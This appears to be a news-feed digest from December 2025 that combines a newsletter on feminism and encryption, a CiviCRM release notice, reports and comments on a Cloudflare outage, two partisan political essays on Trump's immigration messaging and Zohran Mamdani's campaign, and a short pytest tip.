Encryption and Feminism: We’re Bringing The Conversation Online

Internet Exchange
internet.exchangepoint.tech
2025-12-04 15:25:51
A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance....
Original Article
privacy and security

A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance.

Encryption and Feminism: We’re Bringing The Conversation Online
Gerda Binder, Hera Hussain, Georgia Bullen, Audrey Hingle, Lucy Purdon, and Mallory Knodel in our MozFest session.

By Audrey Hingle

Our MozFest session on Encryption and Feminism: Reimagining Child Safety Without Surveillance was bigger than a one-hour festival slot could contain. The room filled fast, people were turned away at the door, and the Q&A could have gone on twice as long. Many attendees told us afterwards that this is the conversation they’ve been waiting to have. That feminist perspectives on encryption aren’t just welcome, they’re needed. So we’re opening the circle wider and taking it online so more people can join in.

In the room, we heard reflections that reminded us why this work matters. In feedback forms, attendees told us encryption isn’t only a security feature, it’s “part of upholding the rights of kids and survivors too, now let’s prove that to the rest of the world!” Another participant said they left ready to “be a champion of encryption to protect all.” Someone else named what many feel: “More feminist spaces are needed!”

It quickly became clear that this work is collective. It’s about shifting assumptions, building new narratives, and demanding technology that does not treat privacy as optional or as something only privacy hardliners or cryptography experts care about. Privacy is safety, dignity, and a precondition for seeking help. It is necessary to explore identity, form relationships, and grow up. Privacy is a human right.

We also heard calls for clarity and practicality: to reduce jargon, show people what encryption actually does, and push more broadly for privacy-preserving features like screenshot protection and sender-controlled forwarding.

Participants also reminded us that encryption must account for disparity and intersectionality. Surveillance is not experienced equally. Some communities never get to “opt in” or consent at all. Feminist principles for encryption must reflect that reality.

And importantly, we heard gratitude for the tone of the session: open, candid, grounded, and not afraid to ask hard questions. “Normalize the ability to have tricky conversations in movement spaces,” someone wrote. We agree. These conversations shouldn’t only happen at conferences, they should live inside policy rooms, product roadmaps, activist communities, parenting forums, classrooms.

So let’s keep going.

New Virtual Session: Encryption and Feminism: Reimagining Child Safety Without Surveillance

🗓️ Feb 10, 4PM GMT, Online

Whether you joined us at MozFest, couldn't make it to Barcelona, or were one of the many who could not get into the room, this session is for you. We are running the event again online so more people can experience the conversation in full. We will revisit the discussion, share insights from the panel, and walk through emerging Feminist Encryption Principles, including the ideas and questions raised by participants.

Speakers will include Chayn’s Hera Hussain, Superbloom’s Georgia Bullen, Courage Everywhere’s Lucy Purdon, UNICEF’s Gerda Binder, and IX’s Mallory Knodel, Ramma Shahid Cheema, and Audrey Hingle.

Help us grow this conversation. Share it with friends and colleagues who imagine a future where children are protected without surveillance and where privacy is not a privilege, but a right.

We hope you’ll join us!

Related: If you care about privacy-preserving messaging apps, Phoenix R&D is inviting feedback through a short survey on which features matter most for people in at-risk contexts.


Hidden Influences: How algorithmic recommenders shape our lives by Dr. Luca Belli

New book from IX client Dr. Luca Belli looks at how recommender systems function, how they are measured, and why accountability remains difficult. Luca draws on his experience co-founding Twitter’s ML Ethics, Transparency and Accountability work, contributing to standards at NIST, and advising the European Commission on recommender transparency.

Now available via MEAP (Manning Early Access Program) on Manning. Readers can access draft chapters as they are released, share feedback directly, and receive the final version when complete. Suitable for researchers, policy teams, engineers, and anyone involved in governance or evaluation of large-scale recommendation systems. It is also written for general readers, with no advanced technical knowledge required, so when you're done with it, hand it to a curious family member who wants to understand how algorithms decide what they see.

Support the Internet Exchange

If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.

Not ready for a long-term commitment? You can always leave us a tip.

Become A Paid Subscriber


Internet Governance

Digital Rights

Technology for Society

Privacy and Security

Upcoming Events

Careers and Funding Opportunities

United States

Global

What did we miss? Please send us a reply or write to editor@exchangepoint.tech.

CiviCRM 6.9 Release

CiviCRM
civicrm.org
2025-12-04 12:01:14
Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the monthly release notes. You are encouraged to upgrade now f...
Original Article

Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the monthly release notes.

You are encouraged to upgrade now for the most stable, secure CiviCRM experience:

Download CiviCRM

Users of the CiviCRM Extended Security Releases (ESR) do not need to upgrade. The current version of ESR is CiviCRM 6.4.x.

Support CiviCRM

CiviCRM is community driven and is sustained through code contributions and generous financial support.

We are committed to keeping CiviCRM free and open, forever. We depend on your support to help make that happen. Please consider supporting CiviCRM today.

Big thanks to all our partners, members, ESR subscribers and contributors who give regularly to support CiviCRM for everyone.

Credits

AGH Strategies - Alice Frumin; Agileware Pty Ltd - Iris, Justin Freeman; akwizgran; ALL IN APPLI - Guillaume Sorel; Artful Robot - Rich Lott; BrightMinded Ltd - Bradley Taylor; Christian Wach; Christina; Circle Interactive - Dave Jenkins, Rhiannon Davies; CiviCoop - Jaap Jansma, Erik Hommel; CiviCRM - Coleman Watts, Tim Otten, Benjamin W; civiservice.de - Gerhard Weber; CompuCo - Muhammad Shahrukh; Coop SymbioTIC - Mathieu Lutfy, Samuel Vanhove, Shane Bill; cs-bennwas; CSES (Chelmsford Science and Engineering Society) - Adam Wood; Dave D; DevApp - David Cativo; Duncan Stanley White; Freeform Solutions - Herb van den Dool; Fuzion - Jitendra Purohit, Luke Stewart; Giant Rabbit - Nathan Freestone; Greenpeace Central and Eastern Europe - Patrick Figel; INOEDE Consulting - Nadaillac; JacquesVanH; JMA Consulting - Seamus Lee; Joinery - Allen Shaw; Lemniscus - Noah Miller; Makoa - Usha F. Matisson; Megaphone Technology Consulting - Jon Goldberg; MJW Consulting - Matthew Wire; Mosier Consulting - Justin Mosier; Nicol Wistreich; OrtmannTeam GmbH - Andreas Lietz; Progressive Technology Project - Jamie McClelland; Richard Baugh; Skvare - Sunil Pawar; Sarah Farrell-Graham; Squiffle Consulting - Aidan Saunders; Tadpole Collective - Kevin Cristiano; Wikimedia Foundation - Eileen McNaughton; Wildsight - Lars Sander-Green

New Extensions

  • Membership AJAX Permissions - This CiviCRM extension modifies API permissions so that the API can be called with just the "Access AJAX API" permission instead of the more restrictive default permissions.
  • civiglific - Integrates Glific (https://glific.org) with CiviCRM to sync contact groups and send automated WhatsApp messages and receipts to contributors.
  • Reply to Inbound Email - Makes it easier to reply to email, quote the original, etc.

View all latest extensions

The US polluters that are rewriting the EU's human rights and climate law

Hacker News
www.somo.nl
2025-12-05 09:58:01
Comments...

Cloudflare down, websites offline with 500 Internal Server Error

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 09:12:15
Cloudflare is down, as websites are crashing with a 500 Internal Server Error. Cloudflare is investigating the reports. [...]...
Original Article


Cloudflare is down, as websites are crashing with a 500 Internal Server Error. Cloudflare has confirmed that it's investigating the reports.

Cloudflare, a service that many websites use to stay fast and secure, is currently facing problems.

Because of this, people visiting some websites are seeing a “500 Internal Server Error” message instead of the normal page.

Cloudflare outage takes down DownDetector

A 500 error usually means something went wrong on the server side, not on the user’s device or internet connection.
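
To make that concrete, here is a minimal Python sketch (ours, not from the article) of a client that retries only when the server reports a 5xx error; the URL, attempt count, and backoff are illustrative assumptions:

import time

import requests

def fetch_with_retry(url: str, attempts: int = 3, delay: float = 2.0):
    # Retry only on 5xx responses: those indicate a server-side failure
    # (like the Cloudflare 500s here), while a 4xx points at the client's
    # own request and is returned immediately.
    response = None
    for attempt in range(1, attempts + 1):
        response = requests.get(url, timeout=10)
        if response.status_code < 500:
            return response
        print(f"attempt {attempt}: server error {response.status_code}, retrying")
        time.sleep(delay * attempt)  # simple linear backoff
    return response

# Example with a placeholder URL:
# resp = fetch_with_retry("https://example.com/")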

In an update to its status page, Cloudflare says it's investigating issues with Cloudflare Dashboard and related APIs.

"Customers using the Dashboard / Cloudflare APIs are impacted as requests might fail and/or errors may be displayed," the company noted.

Cloudflare says it has implemented a fix, and websites should start coming back online soon.

This is a developing story....


Cloudflare Is Down

Hacker News
cloudflare.com
2025-12-05 08:59:00
Comments...
Original Article

Our connectivity cloud is the best place to
  • connect your users, apps, clouds, and networks
  • protect everything you connect to the Internet
  • build and scale applications

Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.

Connect your people, apps and AI agents

Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.




Protect and accelerate websites and AI-enabled apps

Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.


Build and secure AI agents

Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.


One global cloud network unlike any other

Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.

  • 60+ cloud services available globally
  • 234B cyber threats blocked each day
  • 20% of all websites are protected by Cloudflare
  • 330+ cities in 125+ countries, including mainland China



How Cloudflare can help

  • Accelerate website performance
  • Block bot traffic - Stop bot attacks in real time by harnessing data from millions of websites protected by Cloudflare.
  • Optimize video experiences
  • Deploy serverless code - Build serverless applications and deploy instantly across the globe for speed, reliability, and scale.
  • Deploy AI on the edge
  • Eliminate egress fees for object storage


Get started with the connectivity cloud

  • Get started for free - Get easy, instant access to Cloudflare security and performance services.
  • Need help choosing? - Get a personalized product recommendation for your specific needs.
  • Talk to an expert - Have questions or want to get a demo? Get in touch with one of our experts.

Is Cloudflare Down Again? Also, DownDetector/Claude.ai/LinkedIn?

Hacker News
news.ycombinator.com
2025-12-05 08:55:47
Comments...
Original Article
Is Cloudflare Down Again? Also, DownDetector/Claude.ai/LinkedIn?
18 points by dfasoro | 4 comments

I was writing a blogpost on Medium and I noticed errors, tried to open LinkedIn? down. tried downdetector? down. Claude.ai is also down



I'm getting a lot of errors on a lot of pages from cf.



Yep, just went back up and then down again. Let's not put all eggs in one basket...


Cloudflare RIP

Cloudflare Down Again – and DownDetector Is Also Down

Hacker News
news.ycombinator.com
2025-12-05 08:51:42
Comments...
Original Article

https://downdetectorsdowndetectorsdowndetectorsdowndetector.... reports that https://downdetectorsdowndetectorsdowndetector.com/ is down, guessing downdetectorsdowndetectorsdowndetector runs via cloudflare!



This is art



You know what, maybe AI is taking all the goddamn jobs


They pretty much said this. All the big companies that had recent outages are companies that publicly embraced vibe coding.



Time to use some local ai with Docker Model Runner :)

No cloudflare no problem

https://github.com/docker/model-runner


I assume this is why Claude stopped working


There are other LLMs you can ask to be absolutely, 100% sure.


downdetectors downdetector shows that downdector should not be down. Something is wrong here.

https://downdetectorsdowndetector.com/



Crunchyroll down too got me and the anime community stressed


LinkedIn down


i can confirm it down again



jesus fucking christ i just wanna play runescape


This made getting paged at 4am worth it

New Anonymous Phone Service

Schneier
www.schneier.com
2025-12-05 08:08:21
A new anonymous phone service allows you to sign up with just a zip code....

Sabrina Carpenter and the Cruel Authoritarianism of Trump

Portside
portside.org
2025-12-05 06:21:13
Sabrina Carpenter and the Cruel Authoritarianism of Trump jay Fri, 12/05/2025 - 01:21 ...
Original Article

The Trump White House just showed us something every American should find chilling, no matter what music they listen to or what party they vote for.

They took a video of aggressive ICE arrests, slapped Sabrina Carpenter’s song on top of it, and posted it like it was a victory lap. Then, when Carpenter objected and said the video was “evil and disgusting” and told them not to use her music to benefit an “inhumane agenda,” the White House hit back with a statement that sounded like it came from a playground bully, not the seat of American government.

They didn’t debate her point. They didn’t defend policy with facts. They went straight to dehumanization and insult, calling people “illegal murderers, rapists, and pedophiles,” and saying anyone who defends them must be “stupid” or “slow.”

That’s not just ugly: it’s a warning.

Because the biggest story here is not a celebrity clapback; it’s that the White House is using the power of the state to turn human beings into a violence-normalizing punchline, and using America’s culture as a weapon to spread it.

This is what rising authoritarianism looks like in the age of social media.

A democracy survives on shared reality and shared humanity. It survives when the government understands that it works for the people and must be accountable to the Constitution, to due process, and to basic human decency.

But what happens when a government starts producing propaganda like it’s a teenage streamer chasing clicks and the president runs the White House like it’s a reality show operation, right down to the televised Cabinet meetings?

We get a machine that can normalize cruelty. We get a public trained to cheer at humiliation. We get outrage as entertainment. And we get the steady erosion of our ability to ask the most important questions in a free society.

Was this legal? Was it justified? Was it proportional? Was it humane? Were innocent people caught up? Were families separated? Was there due process? Is it even constitutional?

Those questions disappear when the government turns an ICE arrest into a meme.

There are, of course, serious crimes in every society and violent criminals should be held accountable under the law. But that isn’t what the White House statement was doing. It was, instead, engaged in something far more ancient, cynical, and dangerous.

It was trying to paint everyone in that video with the worst label imaginable so the public stops caring about what happens next.

That’s how they get permission — both explicit and implicit — for abuses.

If the audience for Trump’s sick reality show is told, “These are monsters,” then — as we’ve most recently seen both with ICE here domestically and with people in small boats off the coast of Venezuela — any cruelty becomes acceptable.

Any killing becomes a shrug. Overreach becomes a punchline. And following the rule of law becomes something we apply to our friends while we throw it away for people we have been taught to hate.

That is exactly why authoritarians always start by dehumanizing a target group.

And it always spreads.

Trump started by demonizing and then going after immigrants. Then he demanded fealty (and millions of dollars) from journalists, universities, and news organizations. He demonizes his political opponents to the point they suffer death threats, attacks, and assassinations. And if Trump keeps going down this same path — as Pastor Niemöller famously warned the world — it’ll next be you and me.

Consider this regime’s cultural warfare program. The White House has reportedly used music from multiple artists without permission and now brags that they’ve used those creators’ work to bait outrage, to “own the libs.”

All to drive attention, create spectacle, and turn governance into a constant fight as they punish anyone in public life — today it’s Sabrina Carpenter — who dares to speak up.

This is intimidation pretending to be a joke. If you’re an artist, a teacher, an organizer, or just a person with a platform, the message is simple: “We can drag you into our propaganda machine whenever we want, and if you object we’ll mock you and send an online — and often physical — mob after you.”

That’s a chilling reality, and it matters in a democracy. People start to think twice before speaking. They start to retreat. They start to self censor.

And that’s the Trump regime’s first goal.

Then there’s the distraction, particularly from a cratering economy and Trump’s association with Epstein and Maxwell.

With this strategy, borrowed from the Nazis (as my guest on the radio show Monday, Laurence Rees, noted in his book The Nazi Mind: 12 Warnings From History), culture war isn’t a sideshow anymore, it’s part of a larger strategy.

When the government posts a meme like the one where ICE used Carpenter’s music, it isn’t trying to inform us: it’s trying to trigger us. It’s trying to bait us into amplifying the clip, fighting over the celebrity angle, and losing sight of the real issue.

And that real issue is Trump’s and the GOP’s insatiable lust for state power and the wealth that power can allow, bring, and protect.

Armed agents. Detention. Deportation. Families. Fear. Mistakes that can’t be undone. Human beings who can be disappeared from their communities with the tap of a button and a viral soundtrack. Or killed by “suicide” in a jail cell when they threaten to go public.

If we care about freedom, we can’t just stand by and say nothing while this regime turns ICE’s violence into content.

Because once a government learns it can win political points by broadcasting humiliation, it’ll do it again. And it’ll escalate. It’ll push the line farther and farther until we wake up one day and wonder how we got here.

So what do we do?

First, stop amplifying their propaganda on their terms. Don’t share their clips as entertainment, even to condemn them without context (no links in this article). When you must talk about it, talk about the power being abused, not the celebrity drama.

Second, demand oversight. Call your members of Congress (202-224-3121). Demand hearings on ICE media practices and the use of official government accounts and our tax dollars to promote dehumanizing propaganda. Demand transparency on how these videos are produced, approved, and distributed.

Third, support civil liberties groups and immigrant rights organizations that challenge abuses in court and document what’s happening on the ground. Democracy requires watchdogs like them when the people in power act like they’re above the law.

Fourth, get inside the Democratic Party and vote — and help others vote — like it matters, because it does. Local prosecutors, sheriffs, governors, attorneys general, and members of Congress all shape how far this culture of cruelty can spread. Authoritarians rely on fatigue and cynicism. Don’t give them either: participate.

And finally, speak up. Sabrina Carpenter did, and she was right to. Not because she’s a pop star, but because she named the moral truth that the White House is trying to smother with what they pretend are jokes.

When a government starts celebrating the humiliation of vulnerable people, it’s telling the world that it no longer sees itself as the servant of a democratic republic. Of all the people. Instead, it now sees itself as the applause-hungry enforcer of a bloodthirsty tribe.

If we let this become normal, we will — one day soon — no longer recognize our country.

This is the moment to draw a line.

Not just for immigrants. Not just for artists. For the Constitution. For due process. For human dignity. For the idea that in America, power is accountable.

Call. Organize. Vote. Let’s not let cruelty become America’s official language.

[Thom Hartmann is a talk-show host and the author of "The Hidden History of Monopolies: How Big Business Destroyed the American Dream" (2020); "The Hidden History of the Supreme Court and the Betrayal of America" (2019); and more than 25 other books in print.]

Partyism Without the Party

Portside
portside.org
2025-12-05 06:08:02
Partyism Without the Party jay Fri, 12/05/2025 - 01:08 ...
Original Article

When was the last time being on the left was fun? Even in the best of times, supporting socialism in America can feel like performing a grim duty in the face of almost certain disappointment. The chapter titles in Burnout, Hannah Proctor’s investigation of the emotional landscapes of leftist militancy, are revealing: Melancholia, Nostalgia, Depression, Burnout, Exhaustion, Bitterness, Trauma, Mourning. One of the many virtues of Zohran Mamdani’s remarkable campaign for New York City mayor was that it never felt this way, not even when he was sitting near the bottom of the polls. It was a year-long act of collective joy. Real joy—not the brief sugar high that surged when Kamala Harris replaced Joe Biden at the top of the Democrats’ 2024 ticket. Volunteering for Mamdani never felt like a chore, even when the weather was bad and fewer canvassers showed up for their shift than expected. It was a blast from start to finish, and we didn’t even have to console ourselves with a moral victory. This time, we actually won.

We tend to speak of voting as a civic duty, and of boosting voter participation as a high-minded, “good government” concern. The nature of mass politics, however, has often been anything but staid and responsible. Michael McGerr begins his book The Decline of Popular Politics with a colorful account of a Democratic Party “flag raising” in New Haven in 1876. It was a raucous affair, complete with torchlight parades, street corner speeches, brass bands, fireworks, and rivers of booze courtesy of local party notables. Political spectacle hasn’t gone away, but since the advent of modern communications technology it has become enormously mediated. By contrast, historian Richard Bensel has described the “sheer physicality of voting” and party politics in the nineteenth century. People flocked to the polls, Bensel writes, “simply because they were exciting, richly endowed with ethno-cultural themes of identity, manhood, and mutual recognition of community standing.” It was party politics, in both senses of the word.

This era should not be romanticized. Aside from the fact that only men could vote, the atmosphere of drink-soddened masculinity that pervaded election campaigns kept most women away even when it did not descend into partisan and racial violence. Even so, it is hard not to agree with political scientists Daniel Schlozman and Sam Rosenfeld that America’s early mass parties “bequeathed a genuinely popular and participatory” culture whose “promise still haunts American politics.”

Much has been made of Mamdani’s extremely effective use of social media, short-form video, and other digital formats that speak to the younger and disengaged voters many other campaigns struggle to reach. There’s no doubt this was a major ingredient in the campaign’s success; historically high rates of participation among Gen Z and newly registered voters testify to its effectiveness. But the sheer physicality of the Mamdani campaign, and the ways it used digital media to bring people together offline, has been underrated.

Consider the citywide scavenger hunt in August. A call went out over social media on a Saturday night, and thousands of people showed up the next morning to race around seven stops across the boroughs, each one connected to the city’s history. Disgraced incumbent mayor Eric Adams denounced the frivolity: “I’m sure a scavenger hunt was fun for the people with nothing better to do. . . . Mamdani is trying to turn our city into the Squid Games.” One competitor offered a different perspective: “I think actually trying to have fun in politics and do a little bit of a community building exercise, a way to actually learn about our city—I’ve never known another politician to do it.”

The scavenger hunt was just one example of the campaign’s popular and participatory culture. So much of the campaign was in public and in person: mass rallies, a walk through the entire length of Manhattan, unannounced appearances at clubs and concerts, a 100,000-strong army of volunteers who braved countless walk-ups to knock over 1 million doors. From early spring through November’s general election, the campaign assumed the scale and spirit of a social movement, or a Knicks playoff run. There was a palpable buzz around the city—not just in what New York electoral data maven Michael Lange termed the “Commie Corridor” neighborhoods, populated by young college-educated leftists, but in Little Pakistan, Little Bangladesh, Parkchester, and other places where nary a New Yorker tote bag can be found.

When the polls closed, more than 2 million voters had cast their ballots, the highest turnout in a New York City mayoral election since 1969. More than 1 million voters, just over half the electorate, voted for Mamdani. At the same time, over 850,000 voted for Andrew Cuomo, who successfully consolidated many Republican voters behind his second-effort bid to return to public office. Another 146,000 voted for the official Republican candidate, the perennial also-ran Curtis Sliwa.

Mamdani’s shockingly decisive win in the Democratic primary had been powered by his core constituencies: younger voters, college-educated renters, and South Asian and Muslim voters, many of whom participated in the electoral process for the first time. He carried these constituencies with him into the general election, but he may have struggled to win the final contest without rallying large numbers of working-class Black and Hispanic voters too. As Lange has shown, the areas that shifted most strongly toward Mamdani from the primary to the general election were Black and Hispanic neighborhoods in the Bronx, Brooklyn, and Queens. Many Black and Hispanic voters under forty-five were already in Mamdani’s column in the primary, but his numbers then were far lower among their parents and grandparents. After securing the Democratic nomination, his campaign made inroads by building relationships with Black church congregations and community organizations, as well as labor unions with disproportionately Black and Hispanic memberships. By cobbling these disparate constituencies together in the general election, Lange concluded, Mamdani successfully renewed the promise of the Rainbow Coalition for the twenty-first century.


Not By Bread-and-Butter Alone

Explaining how Mamdani did this has become something of a Rorschach test for pundits. Much of the commentary has focused on his campaign’s affordability agenda, which targeted the city’s cost-of-living crisis through proposals for freezing rents, eliminating fares on city buses, and implementing universal child care, among others. While Mamdani’s emphasis on affordability was necessary for securing the victory, and his economic proposals were popular across his constituencies, he would not have been able to mobilize the coalition he did on the strength of bread-and-butter appeals alone. Mamdani’s unequivocal stances on “non-economic” questions like the genocide in Gaza or the ICE raids terrorizing immigrant communities built trust among precisely the people he needed to join his volunteer army or turn out to vote for the first time.

Support for Palestine dovetailed with Mamdani’s vocal opposition to the Trump administration’s assault on immigrants, which came together in an impromptu confrontation with Trump’s “border czar” Tom Homan last March. A video of the encounter, in which Mamdani challenged Homan over the illegal detention of Palestinian solidarity activist Mahmoud Khalil, circulated widely on social media and in immigrant communities. All of this helped Mamdani link his economic program with opposition to the president’s authoritarian lurch. In doing so, he appealed to immigrant voters worried about both ICE raids and making the rent, as well as voters who want their representatives to stand up to masked federal agents snatching people off the streets and whisking them away in unmarked cars. Moreover, Mamdani’s identity as a Muslim of South Asian descent undoubtedly activated demobilized voters excited by the idea of seeing someone like them in Gracie Mansion. The historic turnout surge that swept Muslim and South Asian neighborhoods in the outer boroughs is inseparable from Mamdani’s faith, his cultural fluency, and his outspoken defense of fellow Muslims against the Cuomo campaign’s Islamophobic bigotry.

The New York City chapter of the Democratic Socialists of America (NYC-DSA) has received a lot of credit for Mamdani’s victory, and rightfully so. Mamdani is a DSA member, as are his chief of staff, field director, and other key advisers. The campaign’s field leads, who organized canvassing shifts, were disproportionately members (I co-led a weekly canvass in my Brooklyn neighborhood during the primary). But organizations rooted in South Asian and Muslim communities deserve their fair share of the credit, including Desis Rising Up and Moving (DRUM) Beats, the Muslim Democratic Club of New York, Bangladeshi Americans for Political Progress, and grassroots affinity groups like Pakistanis for Zohran and Bangladeshis for Zohran. The mobilization of these communities transformed the electorate and helped Mamdani offset Cuomo’s strength in neighborhoods that shifted sharply to the former governor in the general election.

There are nearly 1 million Muslims in New York, but until Mamdani’s campaign they were a sleeping giant in local politics. Roughly 350,000 Muslims were registered, but only 12 percent of registered Muslims turned out to vote in the 2021 mayoral election. Mamdani’s campaign turned this dynamic completely on its head. DRUM Beats, which has organizing bases in the Bronx, Brooklyn, and Queens spanning a range of South Asian and Indo-Caribbean diasporic communities, played a key role. Their organizers are committed and tenacious, and many of them are women. “We’re like a gang,” the group’s organizing director Kazi Fouzia told a Politico reporter last summer. “When we go to any shop, people just move aside and say, ‘Oh my god. The DRUM leaders are here. The DRUM women are here.’” When Mamdani recognized “every New Yorker in Kensington and Midwood” in his victory speech, he had in mind the scores of aunties who ran themselves ragged knocking doors, sending texts, and making phone calls.

In their post-election analysis of the voting data, DRUM Beats detailed an enormous increase in turnout in the communities they organize. Based on Board of Elections data and their own models, they estimated that from 2021 to 2025 South Asian turnout exploded from 15.3 percent to nearly 43 percent, while Muslim turnout went from barely 15 percent to over 34 percent. While representing just 7 percent of New York’s registered voters, they accounted for an estimated 15 percent of actual voters in the general election. Nearly half of the city’s registered Bangladeshi and Pakistani American voters participated in the election, outpacing the overall participation rate of roughly 42 percent. This historic development didn’t materialize out of thin air. Mamdani’s faith, identity, and raw talent certainly didn’t hurt, but people on the ground have been quietly building civic infrastructure in these neighborhoods. In his assessment of the South Asian surge, electoral strategist Waleed Shahid noted that the places with the biggest gains were precisely “the places where DRUM Beats and allied organizers have spent years knocking doors, translating ballot measures, convening tenant meetings in basement prayer rooms, and building lists through WhatsApp groups and WhatsApp rumors alike.” I had the good fortune of getting to know some of these organizers during the campaign. Their capacity to mobilize working-class immigrants who had been overlooked for too long is formidable, and Mamdani’s victory cannot be explained without it.

Mamdani claimed the legacy of Fiorello La Guardia and Vito Marcantonio in the campaign’s final days, and the historical resonances ran deep. Shahid drew a parallel between the current moment and earlier realignments in the city’s political history “when groups written off as threatening or foreign became disciplined voting blocs: Irish Catholics moving from despised outsiders to Tammany’s core; Jewish and Italian workers turning the Lower East Side into a labor/socialist stronghold.” I am a product of New York’s twentieth-century Italian American diaspora myself. In rooms full of South Asian aunties for Zohran, wearing headscarves and plying everyone with plates of food, I saw people who in a different time could have been my own relatives stumping for the Little Flower, the legendary figure who was once told New York wasn’t ready for an Italian mayor. Turns out it was ready for an Italian mayor then, and it’s ready for a Muslim mayor now.

A Test for Partyism

Donald Trump’s return to the presidency set off a war of white papers on Democratic Party electoral strategy that shows few signs of a ceasefire. There are a variety of strategic prescriptions, but many of them fall into two broad and infelicitously named camps: popularists and deliverists. Popularists tend to hail from the party’s moderate wing, but not always. There is a leftist variety of popularism, for example, that finds expression in projects like the Center for Working-Class Politics. Ezra Klein has offered perhaps the clearest definition of the popularist persuasion: “Democrats should do a lot of polling to figure out which of their views are popular and which are not popular, and then they should talk about the popular stuff and shut up about the unpopular stuff.” Deliverism, by contrast, focuses less on campaigning and more on governing. As Matt Stoller summarized it in a tweet: “deliver and it helps you win elections. Don’t deliver and you lose.” When Democrats are in power, they should implement bold policies that improve people’s lives and then reap the rewards from a satisfied electorate.

There is an element of “duh, of course” to both schools of thought, but the weaknesses are easy to spot. Popularism seeks to mirror the current state of public opinion for the sake of electoral success, but public opinion is malleable and sometimes quite fickle. One need only look at the wildly fluctuating data on immigration attitudes since the 2024 election to see how quickly chasing public opinion can become a fool’s errand. Deliverism, by contrast, presumes “a linear and direct relationship between economic policy and people’s political allegiances,” as Deepak Bhargava, Shahrzad Shams, and Harry Hanbury put it. But that’s not typically how real people operate. The Biden administration was, in many respects, an experiment in deliverism that failed to deliver. It implemented policies that brought tangible benefits to millions of people but still couldn’t prevent Trump from returning to the White House.

The limitations of both popularism and deliverism have opened space for a new school of thought, one that tackles strategic electoral questions from a different angle (but also has a terrible name): partyism. The political scientist Henry Farrell has usefully summarized its premises: the Democratic Party’s fundamental problem is not its ideological positioning but the fact that it’s not a political party in any real sense. “If Democrats want to succeed,” Farrell writes, they need to “build up the Democratic party as a coherent organization that connects leaders to ordinary people.” In their book The Hollow Parties, Daniel Schlozman and Sam Rosenfeld trace how the Democratic and Republican parties alike have been transformed into rival “blobs” of consultants, donors, strategists, and interest groups. Their critique has been influential, and it has informed a spate of proposals for turning the Democratic Party into a network of civic institutions that engages voters between elections and mediates effectively between leaders and the base.

The Mamdani campaign was arguably the first major test of the partyist approach in practice. While there is no indication that campaign leaders and strategists consciously appropriated these ideas, it is not difficult to see the affinities between them. The campaign brought new and disengaged voters into the fold through novel activities like the scavenger hunt and the Cost of Living Classic, a citywide soccer tournament held in Coney Island. Its sinew and muscle came not from TikTok or Instagram, but rooted civic organizations like NYC-DSA, DRUM Beats, United Auto Workers Region 9A, and the mosques, synagogues, and churches that opened their doors to the candidate. Even four of the five Democratic Party county committees in the city endorsed him, despite their historic wariness of insurgent candidates from the democratic socialist left (only the Queens county committee, a stronghold of dead-end Cuomo supporters, snubbed him). Mamdani’s victory was based, to a significant extent, on organizations with real members who engage in meaningful civic and political activity.

Of all the organizations listed above, however, the least important by far are the official bodies of the Democratic Party. The Mamdani campaign may have embodied an emergent partyist politics, but this is a partyism without the party. NYC-DSA’s electoral strategy, for example, is grounded in the concept of the “party surrogate” first proposed by Jacobin’s Seth Ackerman and developed further by the political scientist Adam Hilton and others. Given the daunting odds of successfully establishing any new party, Hilton proposes a network of chapter-based organizations “oriented toward building a base within working-class communities and labor unions that can also act as an effective independent pressure group on the Democratic Party.” This is precisely what Mamdani and other socialist candidates have done. Primary voters—not party organizations—decide candidate nominations, which radically reduces the incentives for transforming those organizations. Why fill in the hollow parties when you can do much the same thing outside of them?

For now, at least, partyist projects like the one that catapulted Mamdani into political stardom will continue to gestate outside of any formal party organization. The NYC-DSA chapter has doubled in size to 13,000 members since 2024, and that number will likely continue to grow. Organizers have established a new organization called Our Time that is focused on mobilizing campaign volunteers in support of Mamdani’s agenda after he is sworn into office. NYC-DSA, DRUM Beats, labor unions, tenant groups, and other organizations that endorsed Mamdani during the campaign have established a formal coalition called the People’s Majority Alliance to do much the same thing at the organizational leadership level. So it seems unlikely that Mamdani’s coalition will demobilize the way Barack Obama’s did after 2008. These are independent organizations, constituted outside of official Democratic Party institutions, that assume the base-building and mobilization functions a party would carry out directly in most other political systems. This is the form popular and participatory politics takes in the age of hollow parties, raising the possibility that a lost culture once sustained by precinct captains, ward heelers, and saloon keepers could be reborn in a new way.

Rolling back MAGA will require speaking to popular needs and aspirations and delivering on them. It will also require developing our capacities to work together in a spirit of democratic cooperation and public exuberance. The Mamdani campaign laid the foundations for this in one city, but here and elsewhere much more reconstruction remains to be done.

[Chris Maisano is a trade unionist and Democratic Socialists of America activist. He lives in Brooklyn, New York.]

TIL: Subtests in pytest 9.0.0+

Simon Willison
simonwillison.net
2025-12-05 06:03:29
TIL: Subtests in pytest 9.0.0+ I spotted an interesting new feature in the release notes for pytest 9.0.0: subtests. I'm a big user of the pytest.mark.parametrize decorator - see Documentation unit tests from 2018 - so I thought it would be interesting to try out subtests and see if they're a useful...
Original Article

TIL: Subtests in pytest 9.0.0+. I spotted an interesting new feature in the release notes for pytest 9.0.0: subtests.

I'm a big user of the pytest.mark.parametrize decorator - see Documentation unit tests from 2018 - so I thought it would be interesting to try out subtests and see if they're a useful alternative.

Short version: this parameterized test:

@pytest.mark.parametrize("setting", app.SETTINGS)
def test_settings_are_documented(settings_headings, setting):
    assert setting.name in settings_headings

